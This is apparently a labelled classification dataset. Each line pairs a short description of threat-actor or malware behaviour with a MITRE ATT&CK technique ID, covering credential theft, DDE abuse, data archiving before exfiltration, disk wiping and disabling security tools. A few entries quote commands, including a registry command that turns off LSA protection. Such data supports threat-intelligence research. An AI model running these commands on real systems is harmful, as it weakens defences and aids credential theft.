{"text1":"Impacket modules like ntlmrelayx and smbrelayx can be used in conjunction with Network Sniffing and LLMNR\/NBT-NS Poisoning and SMB Relay to gather NetNTLM credentials for Brute Force or relay attacks that can gain code execution.","labels":"['T1557.001']"}
|
|
{"text1":"Lazarus Group executed Responder using the command \"[Responder file path] -i [IP address] -rPv\" on a compromised host to harvest credentials and move laterally.","labels":"['T1557.001']"}
|
|
{"text1":"Pupy can sniff plaintext network credentials and use NBNS Spoofing to poison name services.","labels":"['T1557.001']"}
|
|
{"text1":"Wizard Spider has used the Invoke-Inveigh PowerShell cmdlets, likely for name service poisoning.","labels":"['T1557.001']"}
|
|
{"text1":"Empire can leverage its implementation of Mimikatz to obtain and use golden tickets.","labels":"['T1558.001']"}
|
|
{"text1":"Ke3chang has used Mimikatz to generate Kerberos golden tickets.","labels":"['T1558.001']"}
|
|
{"text1":"Mimikatz's kerberos module can create golden tickets.","labels":"['T1558.001']"}
|
|
{"text1":"AADInternals can be used to forge Kerberos tickets using the password hash of the AZUREADSSOACC account.","labels":"['T1558.002']"}
|
|
{"text1":"Empire can leverage its implementation of Mimikatz to obtain and use silver tickets.","labels":"['T1558.002']"}
|
|
{"text1":"APT29 obtained Ticket Granting Service (TGS) tickets for Active Directory Service Principal Names to crack offline.","labels":"['T1558.003']"}
|
|
{"text1":"FIN7 has used Kerberoasting for credential access and to enable lateral movement.","labels":"['T1558.003']"}
|
|
{"text1":"Operation Wocao has used PowerSploit's Invoke-Kerberoast module to request encrypted service tickets and bruteforce the passwords of Windows service accounts offline.","labels":"['T1558.003']"}
|
|
{"text1":"PowerSploit's \"Invoke-Kerberoast\" module can request service tickets and return crackable ticket hashes.","labels":"['T1558.003']"}
|
|
{"text1":"UNC2452 obtained Ticket Granting Service (TGS) tickets for Active Directory Service Principal Names to crack offline.","labels":"['T1558.003']"}
|
|
{"text1":"Cyclops Blink has the ability to create a pipe to enable inter-process communication.","labels":"['T1559']"}
|
|
{"text1":"HyperStack can connect to the IPC$ share on remote machines.","labels":"['T1559']"}
|
|
{"text1":"FunnyDream can use com objects identified with `CLSID_ShellLink`(`IShellLink` and `IPersistFile`) and `WScript.Shell`(`RegWrite` method) to enable persistence mechanisms.","labels":"['T1559.001']"}
|
|
{"text1":"Gamaredon Group malware can insert malicious macros into documents using a \"Microsoft.Office.Interop\" object.","labels":"['T1559.001']"}
|
|
{"text1":"Gelsemium can use the `IARPUinstallerStringLauncher` COM interface as part of its UAC bypass process.","labels":"['T1559.001']"}
|
|
{"text1":"InvisiMole can use the \"ITaskService\", \"ITaskDefinition\" and \"ITaskSettings\" COM interfaces to schedule a task.","labels":"['T1559.001']"}
|
|
{"text1":"MuddyWater has used malware that has the capability to execute malicious code via COM, DCOM, and Outlook.","labels":"['T1559.001']"}
|
|
{"text1":"Neoichor can use the Internet Explorer (IE) COM interface to connect and receive commands from C2.","labels":"['T1559.001']"}
|
|
{"text1":"Ramsay can use the Windows COM API to schedule tasks and maintain persistence.","labels":"['T1559.001']"}
|
|
{"text1":"APT28 has delivered JHUHUGIT and Koadic by executing PowerShell commands through DDE in Word documents.","labels":"['T1559.002']"}
|
|
{"text1":"APT37 has used Windows DDE for execution of commands and a malicious VBS.","labels":"['T1559.002']"}
|
|
{"text1":"BITTER has executed OLE objects using Microsoft Equation Editor to download and run malicious payloads.","labels":"['T1559.002']"}
|
|
{"text1":"Cobalt Group has sent malicious Word OLE compound documents to victims.","labels":"['T1559.002']"}
|
|
{"text1":"FIN7 spear phishing campaigns have included malicious Word documents with DDE execution.","labels":"['T1559.002']"}
|
|
{"text1":"Gallmaker attempted to exploit Microsoft\u2019s DDE protocol in order to gain access to victim machines and for execution.","labels":"['T1559.002']"}
|
|
{"text1":"HAWKBALL has used an OLE object that uses Equation Editor to drop the embedded shellcode.","labels":"['T1559.002']"}
|
|
{"text1":"KeyBoy uses the Dynamic Data Exchange (DDE) protocol to download remote payloads.","labels":"['T1559.002']"}
|
|
{"text1":"POWERSTATS can use DDE to execute additional payloads on compromised hosts.","labels":"['T1559.002']"}
|
|
{"text1":"Patchwork leveraged the DDE protocol to deliver their malware.","labels":"['T1559.002']"}
|
|
{"text1":"PoetRAT was delivered with documents using DDE to execute malicious code.","labels":"['T1559.002']"}
|
|
{"text1":"RTM can search for specific strings within browser tabs using a Dynamic Data Exchange mechanism.","labels":"['T1559.002']"}
|
|
{"text1":"TA505 has leveraged malicious Word documents that abused DDE.","labels":"['T1559.002']"}
|
|
{"text1":"Valak can execute tasks via OLE.","labels":"['T1559.002']"}
|
|
{"text1":"ADVSTORESHELL encrypts with the 3DES algorithm and a hardcoded key prior to exfiltration.","labels":"['T1560']"}
|
|
{"text1":"APT32's backdoor has used LZMA compression and RC4 encryption before exfiltration.","labels":"['T1560']"}
|
|
{"text1":"AppleSeed has compressed collected data before exfiltration.","labels":"['T1560']"}
|
|
{"text1":"Aria-body has used ZIP to compress data gathered on a compromised host.","labels":"['T1560']"}
|
|
{"text1":"BLUELIGHT can zip files before exfiltration.","labels":"['T1560']"}
|
|
{"text1":"Backdoor.Oldrea writes collected data to a temporary file in an encrypted form before exfiltration to a C2 server.","labels":"['T1560']"}
|
|
{"text1":"BloodHound can compress data collected by its SharpHound ingestor into a ZIP file to be written to disk.","labels":"['T1560']"}
|
|
{"text1":"Bumblebee can compress data stolen from the Registry and volume shadow copies prior to exfiltration.","labels":"['T1560']"}
|
|
{"text1":"Cadelspy has the ability to compress stolen data into a .cab file.","labels":"['T1560']"}
|
|
{"text1":"Chrommme can encrypt and store on disk collected data before exfiltration.","labels":"['T1560']"}
|
|
{"text1":"Daserf hides collected data in password-protected .rar archives.","labels":"['T1560', 'T1560.001']"}
|
|
{"text1":"Dragonfly 2.0 compressed data into .zip files prior to exfiltrating it.","labels":"['T1560']"}
|
|
{"text1":"Dragonfly has compressed data into .zip files prior to exfiltration.","labels":"['T1560']"}
|
|
{"text1":"Emotet has been observed encrypting the data it collects before sending it to the C2 server.","labels":"['T1560']"}
|
|
{"text1":"Empire can ZIP directories on the target system.","labels":"['T1560']"}
|
|
{"text1":"Epic encrypts collected data using a public key framework before sending it over the C2 channel. Some variants encrypt the collected data with AES and encode it with base64 before transmitting it to the C2 server.","labels":"['T1560']"}
|
|
{"text1":"FELIXROOT encrypts collected data with AES and Base64 and then sends it to the C2 server.","labels":"['T1560']"}
|
|
{"text1":"Following data collection, FIN6 has compressed log files into a ZIP archive prior to staging and exfiltration.","labels":"['T1560']"}
|
|
{"text1":"Gold Dragon encrypts data using Base64 before being sent to the command and control server.","labels":"['T1560']"}
|
|
{"text1":"KONNI has encrypted data and files prior to exfiltration.","labels":"['T1560']"}
|
|
{"text1":"Kessel can RC4-encrypt credentials before sending to the C2.","labels":"['T1560']"}
|
|
{"text1":"Lazarus Group has compressed exfiltrated data with RAR and used RomeoDelta malware to archive specified directories in .zip format, encrypt the .zip file, and upload it to C2.","labels":"['T1560']"}
|
|
{"text1":"LightNeuron contains a function to encrypt and store emails that it collects.","labels":"['T1560']"}
|
|
{"text1":"Lizar has encrypted data before sending it to the server.","labels":"['T1560']"}
|
|
{"text1":"Lurid can compress data before sending it.","labels":"['T1560']"}
|
|
{"text1":"NETWIRE has the ability to compress archived screenshots.","labels":"['T1560']"}
|
|
{"text1":"Patchwork encrypted the collected files' path with AES and then encoded them with base64.","labels":"['T1560']"}
|
|
{"text1":"PowerLess can encrypt browser database files prior to exfiltration.","labels":"['T1560']"}
|
|
{"text1":"Proton zips up files before exfiltrating them.","labels":"['T1560']"}
|
|
{"text1":"ShimRatReporter used LZ compression to compress initial reconnaissance reports before sending to the C2.","labels":"['T1560']"}
|
|
{"text1":"TAINTEDSCRIBE has used \"FileReadZipSend\" to compress a file and send to C2.","labels":"['T1560']"}
|
|
{"text1":"VERMIN encrypts the collected files using 3-DES.","labels":"['T1560']"}
|
|
{"text1":"WellMail can archive files on the compromised host.","labels":"['T1560']"}
|
|
{"text1":"XCSSET will compress entire \"~\/Desktop\" folders excluding all \".git\" folders, but only if the total data size is under 200MB.","labels":"['T1560']"}
|
|
{"text1":"Zebrocy has used a method similar to RC4 as well as AES for encryption and hexadecimal for encoding data before exfiltration.","labels":"['T1560']"}
|
|
{"text1":"menuPass has encrypted files and information before exfiltration.","labels":"['T1560']"}
|
|
{"text1":"APT1 has used RAR to compress files before moving them outside of the victim network.","labels":"['T1560.001']"}
|
|
{"text1":"APT3 has used tools to compress data before exfilling it.","labels":"['T1560.001']"}
|
|
{"text1":"APT39 has used WinRAR and 7-Zip to compress and archive stolen data.","labels":"['T1560.001']"}
|
|
{"text1":"APT41 created a RAR archive of targeted files for exfiltration.","labels":"['T1560.001']"}
|
|
{"text1":"Aquatic Panda has used WinRAR to compress memory dumps prior to exfiltration.","labels":"['T1560.001']"}
|
|
{"text1":"BRONZE BUTLER has compressed data into password-protected RAR archives prior to exfiltration.","labels":"['T1560.001']"}
|
|
{"text1":"Calisto uses the \"zip -r\" command to compress the data collected on the local system.","labels":"['T1560.001']"}
|
|
{"text1":"Chimera has used gzip for Linux OS and a modified RAR software to archive data on Windows hosts.","labels":"['T1560.001']"}
|
|
{"text1":"CopyKittens uses ZPP, a .NET console program, to compress files with ZIP.","labels":"['T1560.001']"}
|
|
{"text1":"Crutch has used the WinRAR utility to compress and encrypt stolen files.","labels":"['T1560.001']"}
|
|
{"text1":"During FunnyDream, the threat actors used 7zr.exe to add collected files to an archive.","labels":"['T1560.001']"}
|
|
{"text1":"During Operation CuckooBees, the threat actors used the Makecab utility to compress and a version of WinRAR to create password-protected archives of stolen data prior to exfiltration.","labels":"['T1560.001']"}
|
|
{"text1":"During Operation Honeybee, the threat actors used zip to pack collected files before exfiltration.","labels":"['T1560.001']"}
|
|
{"text1":"During Operation Wocao, threat actors archived collected files with WinRAR, prior to exfiltration.","labels":"['T1560.001']"}
|
|
{"text1":"DustySky can compress files via RAR while staging data to be exfiltrated.","labels":"['T1560.001']"}
|
|
{"text1":"Fox Kitten has used 7-Zip to archive data.","labels":"['T1560.001']"}
|
|
{"text1":"GALLIUM used WinRAR to compress and encrypt stolen data prior to exfiltration.","labels":"['T1560.001']"}
|
|
{"text1":"HAFNIUM has used 7-Zip and WinRAR to compress stolen files for exfiltration.","labels":"['T1560.001']"}
|
|
{"text1":"IceApple can encrypt and compress files using Gzip prior to exfiltration.","labels":"['T1560.001']"}
|
|
{"text1":"InvisiMole uses WinRAR to compress data that is intended to be exfiltrated.","labels":"['T1560.001']"}
|
|
{"text1":"Ke3chang is known to use 7Zip and RAR with passwords to encrypt data prior to exfiltration.","labels":"['T1560.001']"}
|
|
{"text1":"Kimsuky has used QuickZip to archive stolen files before exfiltration.","labels":"['T1560.001']"}
|
|
{"text1":"Micropsia creates a RAR archive based on collected files on the victim's machine.","labels":"['T1560.001']"}
|
|
{"text1":"MuddyWater has used the native Windows cabinet creation tool, makecab.exe, likely to compress stolen data to be uploaded.","labels":"['T1560.001']"}
|
|
{"text1":"Mustang Panda has used RAR to create password-protected archives of collected documents prior to exfiltration.","labels":"['T1560.001']"}
|
|
{"text1":"Octopus has compressed data before exfiltrating it using a tool called Abbrevia.","labels":"['T1560.001']"}
|
|
{"text1":"OopsIE compresses collected files with GZipStream before sending them to its C2 server.","labels":"['T1560.001']"}
|
|
{"text1":"PUNCHBUGGY has Gzipped information and saved it to a random temp file before exfil.","labels":"['T1560.001']"}
|
|
{"text1":"PoetRAT has the ability to compress files with zip.","labels":"['T1560.001']"}
|
|
{"text1":"PoshC2 contains a module for compressing data using ZIP.","labels":"['T1560.001']"}
|
|
{"text1":"PowerShower has used 7Zip to compress .txt, .pdf, .xls or .doc files prior to exfiltration.","labels":"['T1560.001']"}
|
|
{"text1":"Pupy can compress data with Zip before sending it over C2.","labels":"['T1560.001']"}
|
|
{"text1":"Ramsay can compress and archive collected files using WinRAR.","labels":"['T1560.001']"}
|
|
{"text1":"Turian can use WinRAR to create a password-protected archive for files of interest.","labels":"['T1560.001']"}
|
|
{"text1":"UNC2452 used 7-Zip to compress stolen emails into password-protected archives prior to exfiltration.","labels":"['T1560.001']"}
|
|
{"text1":"WindTail has the ability to use the macOS built-in zip utility to archive files.","labels":"['T1560.001']"}
|
|
{"text1":"iKitten will zip up the \/Library\/Keychains directory before exfiltrating it.","labels":"['T1560.001']"}
|
|
{"text1":"BADFLICK has compressed data using the aPLib compression library.","labels":"['T1560.002']"}
|
|
{"text1":"Epic compresses the collected data with bzip2 before sending it to the C2 server.","labels":"['T1560.002']"}
|
|
{"text1":"Gelsemium can compress embedded executables with the zlib library.","labels":"['T1560.002']"}
|
|
{"text1":"InvisiMole can use zlib to compress and decompress data.","labels":"['T1560.002']"}
|
|
{"text1":"TajMahal has the ability to use the open source libraries XZip\/Xunzip and zlib to compress files.","labels":"['T1560.002']"}
|
|
{"text1":"Threat Group-3390 has used RAR to compress, encrypt, and password-protect files prior to exfiltration.","labels":"['T1560.002']"}
|
|
{"text1":"ADVSTORESHELL compresses output data generated by command execution with a custom implementation of the Lempel\u2013Ziv\u2013Welch (LZW) algorithm.","labels":"['T1560.003']"}
|
|
{"text1":"Agent.btz saves system information into an XML file that is then XOR-encoded.","labels":"['T1560.003']"}
|
|
{"text1":"BLUELIGHT has encoded data into a binary blob using XOR.","labels":"['T1560.003']"}
|
|
{"text1":"CopyKittens encrypts data with a substitute cipher prior to exfiltration.","labels":"['T1560.003']"}
|
|
{"text1":"FLASHFLOOD employs the same encoding scheme as SPACESHIP for data it stages. Data is compressed with zlib, and bytes are rotated four times before being XOR'ed with 0x23.","labels":"['T1560.003']"}
|
|
{"text1":"FunnyDream has compressed collected files with zLib and encrypted them using an XOR operation with the string key from the command line or `qwerasdf` if the command line argument doesn\u2019t contain the key. File names are obfuscated using XOR with the same key as the compressed file content.","labels":"['T1560.003']"}
|
|
{"text1":"HAWKBALL has encrypted data with XOR before sending it over the C2 channel.","labels":"['T1560.003']"}
|
|
{"text1":"InvisiMole uses a variation of the XOR cipher to encrypt files before exfiltration.","labels":"['T1560.003']"}
|
|
{"text1":"MESSAGETAP has XOR-encrypted and stored contents of SMS messages that matched its target list.","labels":"['T1560.003']"}
|
|
{"text1":"Machete's collected data is encrypted with AES before exfiltration.","labels":"['T1560.003']"}
|
|
{"text1":"Okrum has used a custom implementation of AES encryption to encrypt collected data.","labels":"['T1560.003']"}
|
|
{"text1":"OopsIE compresses collected files with a simple character replacement scheme before sending them to its C2 server.","labels":"['T1560.003']"}
|
|
{"text1":"OwaAuth DES-encrypts captured credentials using the key 12345678 before writing the credentials to a log file.","labels":"['T1560.003']"}
|
|
{"text1":"RGDoor encrypts files with XOR before sending them back to the C2 server.","labels":"['T1560.003']"}
|
|
{"text1":"Ramsay can store collected documents in a custom container after encrypting and compressing them using RC4 and WinRAR.","labels":"['T1560.003']"}
|
|
{"text1":"Reaver encrypts collected data with an incremental XOR key prior to exfiltration.","labels":"['T1560.003']"}
|
|
{"text1":"Rising Sun can archive data using RC4 encryption and Base64 encoding prior to exfiltration.","labels":"['T1560.003']"}
|
|
{"text1":"SombRAT has encrypted collected data with AES-256 using a hardcoded key.","labels":"['T1560.003']"}
|
|
{"text1":"Squirrelwaffle has encrypted collected data using a XOR-based algorithm.","labels":"['T1560.003']"}
|
|
{"text1":"StrongPity can compress and encrypt archived files into multiple .sft files with a repeated xor encryption scheme.","labels":"['T1560.003']"}
|
|
{"text1":"Stuxnet encrypts exfiltrated data via C2 with static 31-byte long XOR keys.","labels":"['T1560.003']"}
|
|
{"text1":"HermeticWiper has the ability to corrupt disk partitions and obtain raw disk access to destroy data.","labels":"['T1561.001']"}
|
|
{"text1":"MegaCortex can wipe deleted data from all drives using \"cipher.exe\".","labels":"['T1561.001']"}
|
|
{"text1":"RawDisk has been used to directly access the hard disk to help overwrite arbitrarily sized portions of disk content.","labels":"['T1561.001']"}
|
|
{"text1":"StoneDrill can wipe the accessible physical or logical drives of the infected machine.","labels":"['T1561.001']"}
|
|
{"text1":"WhisperGate can overwrite sectors of a victim host's hard drive at periodic offsets.","labels":"['T1561.001']"}
|
|
{"text1":"APT37 has access to destructive malware that is capable of overwriting a machine's Master Boot Record (MBR).","labels":"['T1561.002']"}
|
|
{"text1":"APT38 has used a custom MBR wiper named BOOTWRECK to render systems inoperable.","labels":"['T1561.002']"}
|
|
{"text1":"CaddyWiper has the ability to destroy information about a physical drive's partitions including the MBR, GPT, and partition entries.","labels":"['T1561.002']"}
|
|
{"text1":"HermeticWiper has the ability to corrupt disk partitions, damage the Master Boot Record (MBR), and overwrite the Master File Table (MFT) of all available physical drives.","labels":"['T1561.002']"}
|
|
{"text1":"KillDisk overwrites the first sector of the Master Boot Record with \u201c0x00\u201d.","labels":"['T1561.002']"}
|
|
{"text1":"Lazarus Group malware SHARPKNOT overwrites and deletes the Master Boot Record (MBR) on the victim's machine and has possessed MBR wiper malware since at least 2009.","labels":"['T1561.002']"}
|
|
{"text1":"Sandworm Team has used the BlackEnergy KillDisk component to corrupt the infected system's master boot record.","labels":"['T1561.002']"}
|
|
{"text1":"Shamoon has been seen overwriting features of disk structure such as the MBR.","labels":"['T1561.002']"}
|
|
{"text1":"WhisperGate can overwrite the Master Boot Record (MBR) on victim systems with a malicious 16-bit bootloader.","labels":"['T1561.002']"}
|
|
{"text1":"Magic Hound has disabled LSA protection on compromised hosts using `\"reg\" add HKLM\\SYSTEM\\CurrentControlSet\\Control\\LSA \/v RunAsPPL \/t REG_DWORD \/d 0 \/f`.","labels":"['T1562']"}
|
|
{"text1":"Stuxnet reduces the integrity level of objects to allow write actions.","labels":"['T1562']"}
|
|
{"text1":"APT29 used the service control manager on a remote system to disable services associated with security monitoring products.","labels":"['T1562.001']"}
|
|
{"text1":"Agent Tesla has the capability to kill any running analysis processes and AV software.","labels":"['T1562.001']"}
|
|
{"text1":"Aquatic Panda has attempted to stop endpoint detection and response (EDR) tools on compromised systems.","labels":"['T1562.001']"}
|
|
{"text1":"BRONZE BUTLER has incorporated code into several tools that attempts to terminate anti-virus processes.","labels":"['T1562.001']"}
|
|
{"text1":"Babuk can stop anti-virus services on a compromised host.","labels":"['T1562.001']"}
|
|
{"text1":"Brave Prince terminates antimalware processes.","labels":"['T1562.001']"}
|
|
{"text1":"Carberp has attempted to disable security software by creating a suspended process for the security software and injecting code to delete antivirus core files when the process is resumed.","labels":"['T1562.001']"}
|
|
{"text1":"ChChes can alter the victim's proxy configuration.","labels":"['T1562.001']"}
|
|
{"text1":"Clop can uninstall or disable security products.","labels":"['T1562.001']"}
|
|
{"text1":"Cobalt Strike has the ability to use Smart Applet attacks to disable the Java SecurityManager sandbox.","labels":"['T1562.001']"}
|
|
{"text1":"Conficker terminates various services related to system security and Windows.","labels":"['T1562.001']"}
|
|
{"text1":"DarkComet can disable Security Center functions like anti-virus.","labels":"['T1562.001']"}
|
|
{"text1":"Diavol can attempt to stop security software.","labels":"['T1562.001']"}
|
|
{"text1":"Donut can patch Antimalware Scan Interface (AMSI), Windows Lockdown Policy (WLDP), as well as exit-related Native API functions to avoid process termination.","labels":"['T1562.001']"}
|
|
{"text1":"During Night Dragon, threat actors disabled anti-virus and anti-spyware tools in some instances on the victim\u2019s machines. The actors also disabled proxy settings to allow direct communication from victims to the Internet.","labels":"['T1562.001']"}
|
|
{"text1":"Ebury can disable SELinux Role-Based Access Control and deactivate PAM modules.","labels":"['T1562.001']"}
|
|
{"text1":"Egregor has disabled Windows Defender to evade protections.","labels":"['T1562.001']"}
|
|
{"text1":"FIN6 has deployed a utility script named \"kill.bat\" to disable anti-virus.","labels":"['T1562.001']"}
|
|
{"text1":"Gamaredon Group has delivered macros which can tamper with Microsoft Office security settings.","labels":"['T1562.001']"}
|
|
{"text1":"Gold Dragon terminates anti-malware processes if they\u2019re found running on the system.","labels":"['T1562.001']"}
|
|
{"text1":"Goopy has the ability to disable Microsoft Outlook's security policies to disable macro warnings.","labels":"['T1562.001']"}
|
|
{"text1":"Grandoreiro can hook APIs, kill processes, break file system paths, and change ACLs to prevent security tools from running.","labels":"['T1562.001']"}
|
|
{"text1":"H1N1 kills and disables services for Windows Security Center, and Windows Defender.","labels":"['T1562.001']"}
|
|
{"text1":"HDoor kills anti-virus found on the victim.","labels":"['T1562.001']"}
|
|
{"text1":"Hildegard has modified DNS resolvers to evade DNS monitoring tools.","labels":"['T1562.001']"}
|
|
{"text1":"Imminent Monitor has a feature to disable Windows Task Manager.","labels":"['T1562.001']"}
|
|
{"text1":"Indrik Spider used PsExec to leverage Windows Defender to disable scanning of all downloaded files and to restrict real-time monitoring.","labels":"['T1562.001']"}
|
|
{"text1":"JPIN can lower security settings by changing Registry keys.","labels":"['T1562.001']"}
|
|
{"text1":"KOCTOPUS will attempt to delete or disable all Registry keys and scheduled tasks related to Microsoft Security Defender and Security Essentials.","labels":"['T1562.001']"}
|
|
{"text1":"Kimsuky has been observed turning off Windows Security Center and can hide the AV software window from the view of the infected user.","labels":"['T1562.001']"}
|
|
{"text1":"Lazarus Group malware TangoDelta attempts to terminate various processes associated with McAfee. Additionally, Lazarus Group malware SHARPKNOT disables the Microsoft Windows System Event Notification and Alerter services.","labels":"['T1562.001']"}
|
|
{"text1":"Metamorfo has a function to kill processes associated with defenses and can prevent certain processes from launching.","labels":"['T1562.001']"}
|
|
{"text1":"Meteor can attempt to uninstall Kaspersky Antivirus or remove the Kaspersky license; it can also add all files and folders related to the attack to the Windows Defender exclusion list.","labels":"['T1562.001']"}
|
|
{"text1":"MuddyWater can disable the system's local proxy settings.","labels":"['T1562.001']"}
|
|
{"text1":"NanHaiShu can change Internet Explorer settings to reduce warnings about malware activity.","labels":"['T1562.001']"}
|
|
{"text1":"NanoCore can modify the victim's anti-virus.","labels":"['T1562.001']"}
|
|
{"text1":"Night Dragon has disabled anti-virus and anti-spyware tools in some instances on the victim\u2019s machines. The actors have also disabled proxy settings to allow direct communication from victims to the Internet.","labels":"['T1562.001']"}
|
|
{"text1":"POWERSTATS can disable Microsoft Office Protected View by changing Registry keys.","labels":"['T1562.001']"}
|
|
{"text1":"Proton kills security tools like Wireshark that are running.","labels":"['T1562.001']"}
|
|
{"text1":"Pysa has the capability to stop antivirus services and disable Windows Defender.","labels":"['T1562.001']"}
|
|
{"text1":"QakBot has the ability to modify the Registry to add its binaries to the Windows Defender exclusion list.","labels":"['T1562.001']"}
|
|
{"text1":"REvil can connect to and disable the Symantec server on the victim's network.","labels":"['T1562.001']"}
|
|
{"text1":"Ragnar Locker has attempted to terminate\/stop processes and services associated with endpoint security products.","labels":"['T1562.001']"}
|
|
{"text1":"RobbinHood will search for Windows services that are associated with antivirus software on the system and kill the process.","labels":"['T1562.001']"}
|
|
{"text1":"Ryuk has stopped services related to anti-virus.","labels":"['T1562.001']"}
|
|
{"text1":"SILENTTRINITY's `amsiPatch.py` module can disable Antimalware Scan Interface (AMSI) functions.","labels":"['T1562.001']"}
|
|
{"text1":"SUNBURST attempted to disable software security services following checks against a FNV-1a + XOR hashed hardcoded blocklist.","labels":"['T1562.001']"}
|
|
{"text1":"Skidmap has the ability to set SELinux to permissive mode.","labels":"['T1562.001']"}
|
|
{"text1":"SslMM identifies and kills anti-malware processes.","labels":"['T1562.001']"}
|
|
{"text1":"TA505 has used malware to disable Windows Defender.","labels":"['T1562.001']"}
|
|
{"text1":"TeamTNT has disabled and uninstalled security tools such as Alibaba, Tencent, and BMC cloud monitoring agents on cloud-based infrastructure.","labels":"['T1562.001']"}
|
|
{"text1":"TinyZBot can disable Avira anti-virus.","labels":"['T1562.001']"}
|
|
{"text1":"TrickBot can disable Windows Defender.","labels":"['T1562.001']"}
|
|
{"text1":"Turla has used an AMSI bypass, which patches the in-memory amsi.dll, in PowerShell scripts to bypass Windows antimalware products.","labels":"['T1562.001']"}
|
|
{"text1":"UNC2452 used the service control manager on a remote system to disable services associated with security monitoring products.","labels":"['T1562.001']"}
|
|
{"text1":"Unknown Logger has functionality to disable security tools, including Kaspersky, BitDefender, and MalwareBytes.","labels":"['T1562.001']"}
|
|
{"text1":"WarzoneRAT can disarm Windows Defender during the UAC process to evade detection.","labels":"['T1562.001']"}
|
|
{"text1":"WhisperGate can download and execute AdvancedRun.exe to disable the Windows Defender Threat Protection service and set an exclusion path for the C:\\ drive.","labels":"['T1562.001']"}
|
|
{"text1":"Wizard Spider has shut down or uninstalled security applications on victim systems that might prevent ransomware from executing.","labels":"['T1562.001']"}
|
|
{"text1":"ZxShell can kill AV products' processes.","labels":"['T1562.001']"}
|
|
{"text1":"macOS.OSAMiner has searched for the Activity Monitor process in the System Events process list and kills the process if running. macOS.OSAMiner also searches the operating system's `install.log` for apps matching its hardcoded list, killing all matching process names.","labels":"['T1562.001']"}
|
|
{"text1":"APT29 used \"AUDITPOL\" to prevent the collection of audit logs.","labels":"['T1562.002']"}
|
|
{"text1":"Sandworm Team has disabled event logging on compromised systems.","labels":"['T1562.002']"}
|
|
{"text1":"UNC2452 used \"AUDITPOL\" to prevent the collection of audit logs.","labels":"['T1562.002']"}
|
|
{"text1":"Wevtutil can be used to disable specific event logs on the system.","labels":"['T1562.002']"}
|
|
{"text1":"APT29 used \"netsh\" to configure firewall rules that limited certain UDP outbound packets.","labels":"['T1562.004']"}
|
|
{"text1":"APT38 has created firewall exemptions on specific ports, including ports 443, 6443, 8443, and 9443.","labels":"['T1562.004']"}
|
|
{"text1":"Carbanak may use netsh to add local firewall rule exceptions.","labels":"['T1562.004']"}
|
|
{"text1":"Dragonfly has disabled host-based firewalls. The group has also globally opened port 3389.","labels":"['T1562.004']"}
|
|
{"text1":"During Operation Wocao, threat actors used PowerShell to add and delete rules in the Windows firewall.","labels":"['T1562.004']"}
|
|
{"text1":"Grandoreiro can block the Diebold Warsaw GAS Tecnologia security tool at the firewall level.","labels":"['T1562.004']"}
|
|
{"text1":"HARDRAIN opens the Windows Firewall to modify incoming connections.","labels":"['T1562.004']"}
|
|
{"text1":"HOPLIGHT has modified the firewall using netsh.","labels":"['T1562.004']"}
|
|
{"text1":"InvisiMole has a command to disable routing and the Firewall on the victim\u2019s machine.","labels":"['T1562.004']"}
|
|
{"text1":"Kasidet has the ability to change firewall settings to allow a plug-in to be downloaded.","labels":"['T1562.004']"}
|
|
{"text1":"Moses Staff has used batch scripts that can disable the Windows firewall on specific remote machines.","labels":"['T1562.004']"}
|
|
{"text1":"NanoCore can modify the victim's firewall.","labels":"['T1562.004']"}
|
|
{"text1":"Operation Wocao has used PowerShell to add and delete rules in the Windows firewall.","labels":"['T1562.004']"}
|
|
{"text1":"Remsec can add or remove applications or ports on the Windows firewall or disable it entirely.","labels":"['T1562.004']"}
|
|
{"text1":"Rocke used scripts which killed processes and added firewall rules to block traffic related to other cryptominers.","labels":"['T1562.004']"}
|
|
{"text1":"TeamTNT has disabled \"iptables\".","labels":"['T1562.004']"}
|
|
{"text1":"The \"ZR\" variant of BACKSPACE will check to see if known host-based firewalls are installed on the infected systems. BACKSPACE will attempt to establish a C2 channel, then will examine open windows to identify a pop-up from the firewall software and will simulate a mouse-click to allow the connection to proceed.","labels":"['T1562.004']"}
|
|
{"text1":"njRAT has modified the Windows firewall to allow itself to communicate through the firewall.","labels":"['T1562.004']"}
|
|
{"text1":"Waterbear can hook the \"ZwOpenProcess\" and \"GetExtendedTcpTable\" APIs called by the process of a security product to hide PIDs and TCP records from detection.","labels":"['T1562.006']"}
|
|
{"text1":"Axiom has targeted victims with remote administration tools including RDP.","labels":"['T1563.002']"}
|
|
{"text1":"WannaCry enumerates current remote desktop sessions and tries to execute the malware on each session.","labels":"['T1563.002']"}
|
|
{"text1":"Bundlore uses the \"mktemp\" utility to make unique file and directory names for payloads, such as \"TMP_DIR=`mktemp -d -t x\".","labels":"['T1564']"}
|
|
{"text1":"OSX\/Shlayer has used the \"mktemp\" utility to make random and unique filenames for payloads, such as \"export tmpDir=\"$(mktemp -d \/tmp\/XXXXXXXXXXXX)\"\" or \"mktemp -t Installer\".","labels":"['T1564']"}
|
|
{"text1":"APT32's macOS backdoor hides the clientID file via a chflags function.","labels":"['T1564.001']"}
|
|
{"text1":"AppleJeus has added a leading \".\" to plist filenames, unlisting them from the Finder app and default Terminal directory listings.","labels":"['T1564.001']"}
|
|
{"text1":"Attor can set attributes of log files and directories to HIDDEN, SYSTEM, ARCHIVE, or a combination of those.","labels":"['T1564.001']"}
|
|
{"text1":"Before exfiltration, Okrum's backdoor has used hidden files to store logs and outputs from backdoor commands.","labels":"['T1564.001']"}
|
|
{"text1":"Carberp has created a hidden file in the Startup folder of the current user.","labels":"['T1564.001']"}
|
|
{"text1":"Clambling has the ability to set its file attributes to hidden.","labels":"['T1564.001']"}
|
|
{"text1":"EnvyScout can use hidden directories and files to hide malicious executables.","labels":"['T1564.001']"}
|
|
{"text1":"Explosive has commonly set file and path attributes to hidden.","labels":"['T1564.001']"}
|
|
{"text1":"FruitFly saves itself with a leading \".\" to make it a hidden file.","labels":"['T1564.001']"}
|
|
{"text1":"Imminent Monitor has a dynamic debugging feature to set the file attribute to hidden.","labels":"['T1564.001']"}
|
|
{"text1":"InvisiMole can create hidden system directories.","labels":"['T1564.001']"}
|
|
{"text1":"Lazarus Group has used a VBA Macro to set its file attributes to System and Hidden and has named files with a dot prefix to hide them from the Finder application.","labels":"['T1564.001']"}
|
|
{"text1":"LoudMiner has set the attributes of the VirtualBox directory and VBoxVmService parent directory to \"hidden\".","labels":"['T1564.001']"}
|
|
{"text1":"MacSpy stores itself in \"~\/Library\/.DS_Stores\/\".","labels":"['T1564.001']"}
|
|
{"text1":"Machete has the capability to exfiltrate stolen data to a hidden folder on a removable drive.","labels":"['T1564.001']"}
|
|
